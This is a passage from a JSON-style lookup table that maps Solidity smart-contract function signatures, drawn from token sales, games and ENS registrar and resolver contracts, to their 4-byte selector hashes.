"DeepGold()": "0x74c1438c", "TriggmineToken()": "0x8d77090f", "InseeCoin()": "0xbb5e5875", "LiverpoolvsRoma()": "0x61b94bc7", "STARToken()": "0x2877af10", "BitcoinMobile()": "0x4a2f2333", "getClown(uint256)": "0xe7b6135d", "ClownCore()": "0xd4d81a13", "useProps(uint256[],uint16[],uint16[])": "0x7ac81da5", "createPromoClown(uint256,address,bool)": "0x0ac25e1a", "_createClown(uint256,uint256,uint256,uint256,address)": "0xf52c456f", "_subGene(uint256,uint256,uint256)": "0x3d5aed1d", "_random(uint256)": "0x046d30c7", "MOAC()": "0x19d1d967", "DiamondscoinToken()": "0x090cfb04", "FASET(uint256,string,uint8,string)": "0x999b5c72", "batchRestoreWebGift(address[])": "0xa8324a3f", "transferTokents(address,uint256)": "0x17135b7b", "Logocoin()": "0x5f2af8d9", "TravelCoin()": "0x53216223", "getHealBalance()": "0x23867979", "getContributors(bool,bool)": "0x332e1a81", "getContributorsCount()": "0xfeed5561", "uint256Min(uint256,uint256)": "0x501a7a74", "getSaleHourNow()": "0xb56797fd", "getSaleHour(uint256)": "0x2674899b", "getSaleDayNow()": "0xa7a957ff", "getSaleDay(uint256)": "0xc7efa689", "howMuchCanXContributeNow(address)": "0xbdcbd9d1", "howMuchCanIContributeNow()": "0x56afd6e3", "getBonus(address,uint256,uint256)": "0x79544754", "getBonusNow(address,uint256)": "0x0bf53613", "setManyBonusExtra(address[],uint256)": "0x0e288064", "setBonusExtra(address,uint256)": "0x20f320d0", "setPromoBonus(address,uint256)": "0xfe6129d5", "claimManyTokenFor(address[])": "0x5549563c", "claimTokenFor(address)": "0xc83261bd", "depositOffchain(address,uint256,uint256,bytes)": "0x76cfc366", "depositEth(address,uint256,bytes)": "0x2109cf80", "buyTokensSigned(address,bytes)": "0x9781c3ca", "moveTokens(address,uint256)": "0x10c1b414", "setDeposit(address)": "0x3b80938e", "setWhitelist(address,uint256)": "0x1302d03a", "setPromoTokenController(address)": "0xc0075772", "setCaps(uint256,uint256,uint256)": "0xcaefb79e", "setMinContribution(uint256)": "0x473b0d46", "EthealNormalSale(address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0xc25ae09f", "isOffchainWhitelisted(address,bytes)": "0xa30bdea4", "setManyWhitelist(address[],bool)": "0x44539c72", "setWhitelist(address,bool)": "0x53d6fd59", "setSigner(address)": "0x6c19e783", "EthealWhitelist(address)": "0xdd85b82e", "setHodlerTime(uint256)": "0xb0e9a1ef", "setHodlerStake(address,uint256)": "0x00346b57", "addHodlerStake(address,uint256)": "0x93a378da", "validPurchase(uint256)": "0xbe163d75", "_compareStrings(string,string)": "0x7c68ec4c", "_createTeam(string,string,uint256,address)": "0x323bc818", "getPrizeFund()": "0x19ee1f1c", "buyTeam(uint256)": "0x0feb172f", "getTeamPayouts(uint256,uint256)": "0xb143c916", "payExcess()": "0x7345a3a2", "payTournamentWinner(uint256)": "0x91dbd4c3", "paySemiFinalWinner(uint256)": "0x19689e76", "lockInSemiFinalPrize()": "0x9a4b8fc9", "payQuarterFinalWinner(uint256)": "0xbcedb86c", "lockInQuarterFinalPrize()": "0x30d15b0a", "payLastSixteenWinner(uint256)": "0x0309c7f8", "lockInLastSixteenPrize()": "0x6d2666b9", "createTeam(string,string)": "0x01a682c1", "setDeveloper(address)": "0xff70fa49", "CryptoCupToken()": "0xa8084938", "DCoin()": "0x64c40bbc", "FAPcoin()": "0xc64e03a2", "Mstcoin()": "0x355e1b84", "transferAndLock(address,address,uint256)": "0xbe30eda8", "tokenUnlock(address,uint256,address,uint256)": "0x73201667", "tokenLock(address,uint256)": "0x8df15e19", "incentivesOut(address[],uint256[])": "0xa4faf89e", "incentivesIn(address[],uint256[])": "0xc669c955", "getIncentivesPool()": "0xba6afc50", "inflate()": "0xa5a98d78", "_addAdmin(address)": "0xf978e842", "SvEnsRegistry()": "0x5622d195", "setbuyPrice(uint256)": "0x9e6985e2", "BNDToken()": "0x353fe553", "collectExcess()": "0x836a1e23", "LiteXTokenVesting(address,uint256,uint256,uint256,uint256,bool)": "0xd4dd5d99", "NVISIONCASH()": "0x0a2ebc39", "WXBET()": "0x38d7be3c", "roundIt(uint256)": "0x2f8abfbe", "anOfferWeCantRefuse()": "0xbf8b6466", "canMakeUnrefusableOffer()": "0x0d7172f4", "_createMobster(string,address,uint256,uint256,uint256,string)": "0xf1168e11", "calculateNewPrice(uint256)": "0x8a462fbc", "claimMobsterFunds()": "0xf5fb22ca", "setTokenPrice(uint256,uint256)": "0xeb685c47", "nextPrice(uint256)": "0x2821ca71", "hitMobster(uint256,uint256)": "0x76a327fc", "setHitPrice(uint256)": "0x04198675", "lethalBonusAtHitsLead(uint256)": "0x1b520b68", "getMobster(uint256)": "0x2b0fbf72", "createMobsterWithOwner(string,address,uint256,uint256,uint256,string)": "0xff3f427c", "createMobster(string,uint256,uint256,uint256,string)": "0x21c60c74", "MobSquads2()": "0xf7cc8c13", "_createWhale(string,address,uint256)": "0xca1ac5cb", "getWhale(uint256)": "0xf7b8eeb7", "createContractWhale(string)": "0x4dc189ef", "createPromoWhale(address,string,uint256)": "0x35a4fa30", "WhaleToken()": "0x1aabaffe", "sqrt(uint32)": "0xa972a451", "min(uint32,uint32)": "0xfb8e82b4", "max(uint32,uint32)": "0x01eb6fdd", "getOrder(uint32[8])": "0x2ca5e626", "giveReward(uint256[4],bool,uint32[4])": "0x5283fd87", "checkOwnershipAndAvailability(address,uint256[4])": "0xb85eb295", "enterArena(uint256[4],address)": "0xe712bbad", "TokenAuction()": "0xc5b05616", "SpermToken()": "0x753af202", "myLoveBlocks()": "0x7c163fb8", "createLoveBlock(string,bool)": "0x7198e08c", "totalLoveBlocks()": "0xf1c5d07b", "myLoveBlockCount()": "0xb9b466ab", "KaliToken()": "0x172820de", "ElectricCoin()": "0xffa39d27", "ACEBlock()": "0x65450a90", "AFUN(address,uint256)": "0xbb67be65", "OWN_ChangeToken(string,string,uint8)": "0x8839515c", "MyTestToken1()": "0x6c26493c", "generateLuckyNumbers(uint256)": "0x43f76b98", "BingoLight()": "0x4365e11e", "DSJL()": "0x205ba186", "JTrex()": "0xdf706f77", "transferTokensToDividendManager(address)": "0xee360ff0", "UnicornContract(address,address,address)": "0xe8fc9c10", "setTokenWithoutFee(address,bool)": "0x04ef1353", "canClaimPayout(address)": "0x35d65132", "canClaimRefund(address)": "0x8cca8f64", "setSelfHybridizationPrice(uint256)": "0xaa31e4a0", "_getFreezeTime(uint256)": "0xe270f88c", "getUnfreezingPrice(uint256)": "0x53b5306b", "enableFreezePriceRateRecalc(uint256)": "0x35cf60df", "_getStatsSumHours(uint256)": "0x922b041d", "_getRarity(uint8)": "0x3c5e57e4", "checkFreeze(uint256)": "0x2ebfa208", "selfHybridization(uint256,uint256)": "0x34174331", "createOffer(uint256,uint256,uint256)": "0xdc35a900", "offerPriceCandy(uint256)": "0x8a626ba1", "offerPriceEth(uint256)": "0xef4ba598", "offerExists(uint256)": "0xb5c83592", "setStatsSumHours(uint256,uint256)": "0x2b100a31", "setFreezeMustCalculate(uint256,bool)": "0x54e921cb", "minusFreezeEndTime(uint256,uint256)": "0x09850495", "setFreezeEndTime(uint256,uint256)": "0x883a92e1", "incFreezeIndex(uint256)": "0x9616b410", "setFreezeHybridizationsCount(uint256,uint256)": "0x549ddcbd", "ZYCoin(uint256,string,string)": "0xb78be927", "incFreezeHybridizationsCount(uint256)": "0xb556a895", "createFreeze(uint256,uint256)": "0x47e4ddf2", "freezeExists(uint256)": "0xdd1b89c6", "freezeMustCalculate(uint256)": "0x91256ed0", "freezeEndTime(uint256)": "0x0ecda113", "freezeStatsSumHours(uint256)": "0x65089dd8", "freezeHybridizationsCount(uint256)": "0x0c516283", "freezeIndex(uint256)": "0xf8cbd580", "hybridizationPrice(uint256)": "0x020f899a", "hybridizationExists(uint256)": "0xee34c6ad", "createHybridization(uint256,uint256)": "0x11f02c87", "incGen0Limit()": "0x3c2f7df5", "incGen0PresaleCount()": "0xde0d50e4", "incGen0Count()": "0x5c752f6b", "transferWithFee(address,address,uint256,address,address,uint256)": "0x5b99df7f", "OIA()": "0xb2a91457", "trustedTokens(address)": "0x3cac2387", "tokenMinus(address,address,uint256)": "0x882d851c", "tokenPlus(address,address,uint256)": "0x8fa4c0b1", "newMember(address,bytes20,uint64)": "0xcb5e7d2d", "createMember(address,bytes20,uint64)": "0xfbe413e4", "deleteUsername(bytes20)": "0x2eac5ca2", "removeMember(address,bytes32)": "0xca7ca5b4", "SolClub()": "0x7c31975f", "getJackpotRoundEndTime()": "0x1a6dafa6", "getGameStartTime()": "0x4b50c9f0", "COR()": "0x38f196b2", "getCurrentGameInfo()": "0xa645e840", "getGameConstants()": "0x542df7c7", "getMyGameInfo()": "0xfcdb2c04", "h2g2()": "0x6b424d47", "getPlayerGameInfo(uint256,address)": "0x9cd22211", "getJackpotInfo()": "0x0be8287e", "updateTimeBetweenGames(uint256)": "0xf1233b79", "JPCoin()": "0x59362835", "DLTESTToken(uint256,string,uint8,string)": "0x196be409", "setBoxPrice(uint256,uint256,uint256)": "0xaac24374", "newClassPlayer(uint256,uint256,uint32,uint32,uint32,uint32,uint32,uint32,uint32)": "0xd93a0a8e", "CatalogPlayers()": "0x4f6a461a", "_set10()": "0xe7316a95", "_set9()": "0x596bda14", "_set11()": "0x74f28eaf", "_set8()": "0xe8fcda45", "_set7()": "0xdd3c407f", "_set6()": "0x87dba600", "_set5()": "0xceb408b4", "_set4()": "0x9cdaef4d", "_set3()": "0x77b2d590", "_set2()": "0x983ce499", "_set1()": "0xfde46b03", "sexToken()": "0x6d07e3de", "N2C()": "0xf2bbdab4", "TokenSale(address,address,address,address)": "0x0dfad849", "GLOBALETHER()": "0xa96b1828", "VictoryX(uint256,string,uint8,string)": "0xa7084516", "PhilToken()": "0x7ae74432", "decreaseRate(uint256,address)": "0xee777c99", "increaseRate(uint256,address)": "0x5e6b4ee5", "KHCToken()": "0x3a37a917", "TalentCoin(address,uint256,string,uint256,string,uint256)": "0xd37cd1d9", "availableTokens()": "0x69bb4dc2", "toNextStage()": "0xfe68e285", "getTokensAmount(uint256)": "0x8526492f", "getTokensCost(uint256)": "0x73493f09", "refundMoney(uint256)": "0x24accfa3", "setWithdraw(address)": "0xe47dea1d", "calcMultiStage()": "0x2bfefd5c", "forceWithdraw()": "0x7be80b39", "stageRate()": "0x15ae1972", "stageBaseRate()": "0x17a66006", "availableOnStage()": "0x25c5ce04", "stageCap()": "0x449106ac", "delWhitelist(address)": "0x97ecfaab", "importAmountForAddresses(uint256[],address[])": "0x0c1838e9", "balancesImporter3()": "0xd6e3dd77", "validatePurchase(uint256)": "0xb5d11d39", "mintToken(address,uint256,int256)": "0xaeb8f966", "addToWhiteList(address[],uint256)": "0x3aaec5c5", "updateWeiCap(uint256)": "0xce522f22", "JOZ()": "0x665f5149", "getFinalAmount(uint256,uint8)": "0x3aa0145a", "conversionWhitelist()": "0xc45d3d92", "calculateCrossConnectorReturn(uint256,uint32,uint256,uint32,uint256)": "0x65098bb3", "isWhitelisted(address,address)": "0xb6b35272", "enableFeatures(uint256,bool)": "0x2c7077c0", "isSupported(address,uint256)": "0xa5fbf287", "MaggieToken()": "0x48b537ce", "isWhalePaying()": "0x87191e41", "excludeWhale(address)": "0xc2d4423f", "buyAndSellPrice()": "0x3daa33d5", "goPublic()": "0x8417fa2f", "setGames(address)": "0x530c4ca6", "TBEToken()": "0x8b7e7a2e", "isHotWallet(address,address)": "0xf0abb382", "burnGoldTokens(address,uint256)": "0xe43f8424", "issueGoldTokens(address,uint256)": "0x1d7c8894", "transferGoldFromHotWallet(address,uint256,string)": "0x9c2108eb", "processInternalRequest(string,bool,uint256,uint256)": "0xa5917dea", "processSellRequest(string,address,uint256,uint256)": "0x69bd4ec5", "processBuyRequest(string,address,uint256,uint256)": "0x81baf55e", "processRequest(uint256,uint256,uint256)": "0xd3a56ec3", "addSellTokensRequest(string,string)": "0x5dcbc01e", "addBuyTokensRequest(string,string)": "0x2da5deb4", "getDoc(uint256)": "0x2ba665e5", "changeFiatFeeContract(address)": "0x140d3e95", "getHotWalletAddress()": "0x40b5886b", "setHotWalletAddress(address)": "0xfc1c2180", "StorageController(address,address,address,address)": "0x8ef47296", "calculateSellGoldFee(uint256,uint256)": "0x914b7fd2", "calculateBuyGoldFee(uint256,uint256)": "0xc3d55adc", "setGoldmintFeeAccount(string)": "0xb65e1ab8", "getGoldmintFeeAccount()": "0xd0747a9c", "GoldFiatFee(string)": "0x136125a7", "setRequestProcessed(uint256)": "0x27b9c257", "getRequestsCount()": "0x3410452a", "addSellTokensRequest(address,string,string)": "0x06ba2987", "addBuyTokensRequest(address,string,string)": "0x4e3c50a0", "getUserHotGoldBalance(string)": "0x1ad9f190", "getGoldTransaction(string,uint256)": "0xebe09a93", "getAllGoldTransactionsCount()": "0x5dd284e3", "getGoldTransactionsCount(string)": "0x1332143c", "addGoldTransaction(string,int256)": "0x9aaa5750", "getUserFiatBalance(string)": "0x23b493fe", "getFiatTransaction(string,uint256)": "0xa08c0908", "getAllFiatTransactionsCount()": "0xd331aeb3", "getFiatTransactionsCount(string)": "0x9e92dfd8", "addFiatTransaction(string,int256)": "0xe3d6ce2b", "getDocAsBytes64(uint256)": "0xafa60487", "getDocCount()": "0x63704e93", "addDoc(string)": "0x20bacfbd", "setHotWalletAddress(address,address)": "0x65ef1a3f", "setControllerAddress(address)": "0xf3d3d448", "bytes64ToString(bytes32,bytes32)": "0x1453d756", "stringToBytes64(string)": "0xeb36f8e8", "getBountyAddress()": "0x85448c59", "signupUserWhitelist(address[])": "0x291681b5", "adminUpdateWallet(address)": "0x3e80cbc6", "reClaimBalance()": "0xc721cfe2", "addAdminWhitelist(address)": "0xcbed1568", "CDcurrency()": "0x05c0e497", "distributeBounty()": "0xe34a90a7", "JesusCrowdsale()": "0xcded6fa5", "appendUintToString(string,uint256)": "0xc80667e3", "proposal(uint256)": "0x30326c17", "startTokenVotes(address[10])": "0x54f81786", "TokenListingManager()": "0x4b1700df", "createDestructibleCloneToken(address,uint256,string,uint8,string,bool)": "0x408e097c", "DestructibleMiniMeToken(address,address,uint256,string,uint8,string,bool,address)": "0x86633571", "getMinimumAmount()": "0x62066eb3", "proxyTakeEtherBack(address)": "0xf3813163", "takeEtherBack()": "0x3c7045fe", "endSale(address)": "0x8c9f7b39", "transferFee(address,uint256)": "0xbf363b18", "MonetoSale(address,address)": "0xa91fbb99", "Moneto(address)": "0x9871cb8f", "stringEqual(string,string)": "0xa1298368", "getAddressForAccount(string)": "0xfa76b253", "buyTokens(string)": "0x6f85e62c", "completeSale()": "0x4d461ed1", "startSale(uint32,uint64,uint64)": "0xcfe0eeb7", "totalDonors()": "0x25c302e4", "ownershipTransferAllowed()": "0xd811f09e", "reserveBountyRecipient()": "0x69ded293", "totalSupplyTmp()": "0xee31f9f6", "numRegistries()": "0xd72d8dd6", "privateOfferingCap()": "0x247bb39c", "saleTime()": "0x1596facb", "CLN_PER_ETH()": "0x5b3b20e1", "ico3total()": "0xe644d886", "payerContract()": "0xc14a6046", "blockedContract()": "0x71ea29df", "etherHardCap()": "0xfa7860da", "activeSignersCount()": "0x124279a7", "getBtcForkCoins()": "0x3442a868", "AIRDROP_TOKENS_NUMS()": "0xbf5cf791", "increaseJackpotTimeAfterBet()": "0x8889025a", "lastBlock_v7Hash_uint256()": "0x6b2fa6cc", "havven()": "0x9c4de81f", "EMISSION_FOR_BOUNTY()": "0x369388cc", "lastWinnerAddress()": "0x1ec41163", "weddingdate()": "0xbb1d7ffa", "ownerShareInPercent()": "0x5fa413b0", "disallowNorthPoleMinting()": "0x3bdc5173", "STATE_NOT_STARTED()": "0xf5b12540", "MIN_CONTRIBUTION_CHF()": "0x41c8ba1e", "saleExchangeRate1()": "0xc6049946", "wanport()": "0x7f0bd881", "salePeriod()": "0x9ed5c84c", "minerTimeOfLastProof()": "0xa685ae66", "coinIssuedTotal()": "0x157f33f5", "chris()": "0x8c4b87d2", "stopAt()": "0xacd5b7b9", "fundRaisedDuringPublicSale()": "0xc0feb62d", "salesStart()": "0xd0005aa4", "icostarted()": "0x6777d177", "peony()": "0xd8a140f9", "preSaleListTime()": "0xc51215df", "nextCommonTTWTokenId2()": "0x7758d407", "contractFinalized()": "0xf1870e0c", "teamAddress()": "0x1c75f085", "presaleEnds()": "0x9646df4d", "periodPreITO_mainCapInUSD()": "0xcbac21b8", "isPrivate()": "0xfaff660e", "infoAboveSpot()": "0xc8c1a400", "miningReward()": "0x4ac2d103", "getJackPot()": "0xf1bd4c04", "oldTokenReward()": "0xbfbc944c", "cln()": "0x90604005", "getPurchaseLimit()": "0x0adde487", "tokenMintCap()": "0x721ff138", "teamKeepingPerEpoch()": "0xf6460964", "contributorsAllocation()": "0x1a51a28c", "getNoteKeysCount()": "0x1dce0b5c", "points()": "0x1be6dd64", "ETHOfCrySolObjects()": "0xe548f086", "emissionStage()": "0xe6f6e19f", "bonusOn()": "0xb3b294a6", "roundFourTime()": "0x9f8ae5d3", "setExpiredAndWithdraw()": "0xd156549f", "claimOwnerSupply()": "0x3da1eff5", "_hackoinToken()": "0x87717cb1", "MARKETING_supply()": "0xafef0e28", "VOLUME_EXTRA_BONUS_CONDITION()": "0x9c4261b9", "reCommentRewardPool()": "0x6b755aa2", "privateIcoMinimumContribution()": "0xbbb01c9c", "third_bonus_amount()": "0x3d957b0b", "max_fortunes()": "0x4b432966", "month24Unlock()": "0x65679536", "MAIN_SALE_BONUS_PERCENTAGE_PHASE2()": "0x8b1c80e2", "MIN_BUYBACK_VALUE()": "0xe92f8cfc", "LaunchPartnersAmount()": "0x3ca520f5", "carTaxiToken()": "0xa43b7cd5", "getPost()": "0x8c6838ba", "secondTimer()": "0x2b5ad2ad", "pauseOperator()": "0x4afdcbde", "VESTING_DURATION_2Y()": "0xc71e876b", "baseTokenPrice()": "0x1da93873", "pot_total()": "0x61a65433", "MAX_UINT48()": "0x64fe5cde", "minTokenPurchaseAmount()": "0x96a942c7", "tpt()": "0x57cff409", "oneTimePrice()": "0x2cb6a435", "lottoPrice()": "0x4fafee40", "phase3Cap()": "0xd8cba7a2", "ADDITIONAL_BONUS_DENOM()": "0x52860ea2", "contestOverTime()": "0x91481123", "TOKENS_PER_USD()": "0xd5356b7d", "ccStartTime()": "0xff1d91b4", "SHAREPERIOD()": "0x90b3195f", "sequence()": "0x529d15cc", "BUY_BACK_BONUS()": "0x261bd0f1", "MINCONTRIBUTION()": "0x09c2b7f8", "isVerfied()": "0xae11cf73", "minimumParticipationAmount()": "0x0683d56a", "jackpotConditionPercent()": "0x2fa92dde", "PreCrowdAllocation()": "0x3c203d44", "EXPERTS_POOL_ADDR()": "0x50213c9f", "maxDonors()": "0x1e912334", "crowdSaleOn()": "0x3955f12e", "minimumContributionPhase2()": "0x8aa986f6", "assertStillValid(uint256)": "0xb3ee4564", "assertSaneBalance(uint256,uint256,uint256)": "0xb4861ca5", "assertMatchingBalance(uint256,uint256)": "0xf17b5bb0", "assertYoungerBalance(uint256,uint256)": "0xad5dabb0", "assertReadyToClose(uint256)": "0xc1674b74", "assertOnlyParticipants(uint256)": "0x377d54ce", "assertOnlyTo(uint256)": "0xe575c5cb", "assertOnlyFrom(uint256)": "0xab911060", "assertAvailable(uint256)": "0x559fb6f5", "isAvailable(uint256)": "0x3a178d99", "MicropaymentsNetwork()": "0xb81ce8a7", "releaseFine()": "0xa9ba2b09", "claimFine()": "0x0351947f", "bankToCharm(string,uint256)": "0x66aecfa7", "payToFines(uint256)": "0x9a881ab4", "payToBank(uint256)": "0x885349a2", "payToCharm(string,uint256)": "0x9aeb5947", "_transfer(address,string,address,string,uint256)": "0x8af51833", "_validCharm(string)": "0x90bd301e", "assignPlayer(string,address)": "0xa2af0e37", "resetGame()": "0xbb472219", "MonopolyBank(uint256,string,uint8,string,address)": "0xf065c36e", "newGame(string,string)": "0x424bc2e9", "newBankManager(address)": "0x245fa2ab", "ServiceProvider(string,string,string)": "0x2df056bd", "payToProvider(uint256,address)": "0x812fd5d7", "MyUserName(string)": "0x95d22683", "getTargetSupply()": "0xdea6aec7", "getIsMigratingFromLegacy()": "0x7cf99c33", "migrateAllowancesFromLegacyRep(address[],address[])": "0xde4c0574", "migrateBalancesFromLegacyRep(address[])": "0x7f686259", "updateParentTotalTheoreticalSupply()": "0xa819515d", "getLegacyRepToken()": "0x77469275", "migrateOutByPayout(uint256[],bool,uint256)": "0x398c1a89", "methodThatThrows(bool)": "0x00cb1ae4", "unusedMethod(address)": "0x231c1ce8", "removeFromMap(uint256[])": "0x88a95495", "addToMap(uint256[])": "0xdfaa3136", "constantFn(uint256)": "0x591d8bd0", "viewFn(uint256)": "0x4b7fa6db", "pureFn(uint256)": "0xa828eec5", "deleteItem(bytes32)": "0x83343d80", "new_id()": "0x3a0a377b", "setExists(bytes32,bool)": "0xefd7313d", "setPublisher(address)": "0xcab63661", "setCurrentMember(address)": "0x425946e3", "getFunctioName()": "0xd2f40cab", "OrganFunction(string,string)": "0x45fe5850", "accreditationMember(address,address)": "0xacb1516f", "bootstrap2()": "0xe63da5f7", "boostrapParty(address,address)": "0xc8422c2d", "KUEKeNParty(string)": "0xc9ce1c23", "setBlogregistry(address)": "0x0191903e", "getMemberRegistry()": "0xaf63da13", "removeSubDivision(uint256)": "0x0323f64a", "addSubDivision(address)": "0x5c1bc695", "addOrgan(address)": "0xc6f017e1", "createOrgan(string)": "0xe1c5d838", "setBallotFactory(address)": "0x36a7cf1f", "setBlogRegistry(address)": "0x6de9ebb1", "setOrganName(string)": "0x0048236b", "getOrganName()": "0x996ea781", "getOrganFunction(uint256)": "0xfc157b13", "addOrganFunction(address,string)": "0x0ae100d8", "getOrganBlog()": "0x18126325", "getLastBallot()": "0x077e43b4", "createBallot(uint256,address,string,string)": "0xc90d2cd9", "publishFunctionMessage(uint256,string,string,string)": "0x994d3be3", "initalizeOrgan()": "0xc7b23ec6", "createFunction(string,string)": "0xa9764152", "changeMember(uint256,address,address)": "0x113353a8", "manageInvitations(uint256,address[],address[])": "0x45585afe", "joinProvider(uint256)": "0x92c87280", "setProviderDetails(uint256,string,string,uint256,string,uint8,address)": "0x419e7589", "openProvider(bool,string,string,uint256,string,uint8,bool,address)": "0x32b4b5ed", "provider(bool,address,address,address)": "0xf1d20d4d", "_setProviderInvitedUser(uint256,address,bool)": "0x454584e6", "_isProviderValid(uint256)": "0x57263ce1", "_setProviderInfoFields(uint256,string,string,uint256,string,address,uint8)": "0xb3535fe2", "_closeProvider(address)": "0xd384077d", "_openProvider(bool,string,string,uint256,string,uint8,bool,address)": "0x703c8a99", "_checkForJoin(uint256,address,uint256)": "0x289768b7", "_partFromProvider(uint256,address)": "0xb0f471dd", "_joinToProvider(uint256,address)": "0x50bc4ae6", "_isClientPaidUp(address)": "0xccef6d63", "slice(address[],uint256,uint256)": "0xf8469646", "swapHotCold()": "0x293c29de", "addClip(string)": "0x518995cd", "blockPlaylist(string)": "0x41193c18", "mineBlocks(uint256)": "0xf82de7b0", "setBlockHash(bytes32)": "0x2127c30a", "setBlockNum(uint256)": "0x2bdd2290", "AdjustableRoundsManager(address)": "0x3163b41a", "fun(bytes32)": "0x0c112598", "testSetPermissions()": "0x60cf7133", "testAccessPermissions()": "0x2f408990", "testControllerShouldBeSet()": "0x822c7671", "queryPrice()": "0xb0667cf8", "EthCnyPrice()": "0xbc57275b", "CardToken(uint256,string,string,string,string)": "0xd1eabc94", "setTransferEnable(bool)": "0xce1ffcd9", "GBAChain(uint256,address)": "0xa22bb384", "level2Bonus(uint256)": "0x726678e7", "calcLevel2Bonus(uint256)": "0x0e86b63e", "getPercentage()": "0x0b2accb2", "returnTokens(uint256)": "0x3ae1786f", "checkTargetReached()": "0x44b1e09d", "devResWithdrawal()": "0x16ebd6d5", "devWithdrawal(uint256,uint256)": "0xb7719ef5", "BitQuickpay()": "0x3a2f1289", "disableToken(bool)": "0xc3a6e2a7", "NexxusToken()": "0x2fe55632", "PerfectCoinControl()": "0x79dd02cb", "PerfectCoin()": "0xbd8f61d8", "getCharacter(address,uint256)": "0xe4cb30ad", "charactersCountOf(address)": "0xd214becb", "setAwardTokens(bool)": "0x6779da43", "ETCharPresale_v2(address)": "0xa810bc13", "BOXSToken()": "0x5c2b0287", "setLoveUrl(string)": "0xad9c280f", "PiaoPiaoToken()": "0xd9326337", "StanleyToken()": "0xa4381dd4", "_calculateNewPrice(uint256)": "0xd19e1ad4", "_calculatePaymentToOwner(uint256,bool)": "0x030745ec", "_transferPlayer(address,address,uint256)": "0xe0cf1316", "_createPlayer(string,uint256,address,uint256)": "0x88d116b8", "_withdrawAmount(address,uint256)": "0x22c1d0d2", "purchasePlayer(uint256)": "0x075881d6", "totalPlayerSupply()": "0x2d144e6b", "balanceOfPlayers(address)": "0x956fd9df", "teamOwnerOfPlayer(uint256)": "0x0488781a", "ownerOfPlayer(uint256)": "0xbfcc8b6d", "getPlayersOfOwner(address)": "0xadc73d46", "getTeamsOfOwner(address)": "0x92f461ed", "priceOfPlayer(uint256)": "0x7ae488c3", "priceOfTeam(uint256)": "0xcc6eced7", "withdrawAmount(address,uint256)": "0x736fe565", "changePlayerTeam(uint256,uint256)": "0x6fff0652", "changePlayerName(uint256,string)": "0x5d72b30d", "changeTeamName(uint256,string)": "0xa7fb95f6", "createPlayer(string,uint256,uint256)": "0xb96a39bd", "createPromoTeam(string,address,uint256)": "0x8faad4c4", "createTeam(string,uint256)": "0xad8ead69", "PAYToken()": "0xec3a0489", "addPlotAndData(uint24[],string,string,uint256)": "0x88b2ed1a", "validatePurchaseAndDistributeFunds(uint24[],uint24[],uint256[])": "0x7e7be158", "ownershipLength()": "0x1f677d8d", "getPlotData(uint256)": "0xf2b0a55d", "getPlotInfo(uint256)": "0x1db29a20", "togglePlotBlockedTag(uint256,bool)": "0x5cf38f24", "updatePlotData(uint256,string,string)": "0x4efb7296", "updatePlotPrice(uint256,uint256)": "0x398e92a5", "purchaseAreaWithData(uint24[],uint24[],uint256[],string,string,uint256)": "0xa2651d30", "PlendsToken()": "0x8e64a720", "HashGardToken()": "0x8b2a81ed", "RRRR_Token()": "0x2e5c4cef", "IPTVcontract()": "0x9ff34878", "toggleSale()": "0x7d8966e4", "RoseCoin()": "0xfed0827e", "notifyBurn(address[])": "0x8cceb1e8", "LetItPlayTokenPromo()": "0xb1c19c4d", "Crowdsaled()": "0x3f250493", "ProofOfKennyCoin()": "0x5a1e9c79", "PUKCoin()": "0xcc3efd6b", "Imdex()": "0x0924fbba", "proveIt(string)": "0xb47a7a67", "proveIt(bytes32)": "0xb245923e", "getEther(address,address)": "0x22f709dd", "giveEther()": "0x081e1b12", "getBalances(address,address)": "0x045d46c2", "freezeMyFunds(uint256,uint256)": "0x46a6c499", "freezeUserFunds(address,address,uint256,uint256)": "0x6fe9e7d7", "_freezeFunds(address,address,uint256,uint256)": "0x0ec1268c", "lockAccount(address,address,uint256)": "0x4d387d35", "setMonthOpen(uint256,uint256,uint8,uint256,uint256)": "0xcc750395", "setMonthClose(uint256,bool)": "0x14870a57", "setMinEther(uint256)": "0x7aef1d4d", "setSellToContract(bool)": "0xdda63359", "setExchange(uint256,uint256,uint256,uint256)": "0x21bb86ab", "setAirDrop(uint256,uint256,uint256,uint256)": "0xf688bb2b", "setDrop(bool)": "0x9a4b87f1", "MyToken(address)": "0xd3617e7a", "EtherGold()": "0x4336a5a8", "BlackSeaCoin()": "0xfa113773", "getMiniPoolEdit_9()": "0x02a4e849", "setMiniPoolEdit_9(string)": "0x04904105", "getMiniPoolEdit_8()": "0xf101618a", "setMiniPoolEdit_8(string)": "0xe365fd7f", "getMiniPoolEdit_7()": "0x66f1e438", "setMiniPoolEdit_7(string)": "0xc226d279", "getMiniPoolEdit_6()": "0x6d30d07f", "setMiniPoolEdit_6(string)": "0x6ff2c12a", "getMiniPoolEdit_5()": "0x4f0ca055", "setMiniPoolEdit_5(string)": "0x72cde347", "getMiniPoolEdit_4()": "0x4077ef5d", "setMiniPoolEdit_4(string)": "0x7df54c73", "getMiniPoolEdit_3()": "0xefcc3c7f", "setMiniPoolEdit_3(string)": "0xff84d49f", "getMiniPoolEdit_2()": "0x2784d868", "setMiniPoolEdit_2(string)": "0xa5c154b3", "removeRelease(bytes32,string)": "0x244fcd03", "setRelease(bytes32,bytes32,string)": "0x8b859409", "rootNode()": "0xfaff50a8", "registryCreated()": "0xb88eef53", "sealedBids(bytes32)": "0x61584936", "ens()": "0x3f15457f", "entries(bytes32)": "0x267b6922", "TestRegistrar(address,bytes32)": "0x003538c5", "setHash(bytes32,bytes32)": "0xd7fa1007", "hash(bytes32)": "0xd8389dc5", "renewDeed(bytes32)": "0x3dfb4843", "updatedValue(bytes32)": "0xe8efc1a0", "register(bytes32,address)": "0xd22057a9", "FIFSRegistrar(address,bytes32)": "0x9d063ed8", "setTTL(bytes32,uint64)": "0x14ab9038", "setResolver(bytes32,address)": "0x1896f70a", "setSubnodeOwner(bytes32,bytes32,address)": "0x06ab5923", "setOwner(bytes32,address)": "0x5b0fc9c3", "ttl(bytes32)": "0x16a25cbd", "resolver(bytes32)": "0x0178b8bf", "owner(bytes32)": "0x02571be3", "ENS()": "0x1d2e2cc4", "setContent(bytes32,bytes32)": "0xc3d014d6", "content(bytes32)": "0x2dff6941", "setAddr(bytes32,address)": "0xd5fa2b00", "addr(bytes32)": "0x3b3b57de", "supportsInterface(bytes4)": "0x01ffc9a7", "has(bytes32,bytes32)": "0x41b9dc2b", "PublicResolver(address)": "0xebb045fa", "transferRegistrars(bytes32)": "0x5ddae283", "invalidateName(string)": "0x15f73331", "releaseDeed(bytes32)": "0x0230a07c", "finalizeAuction(bytes32)": 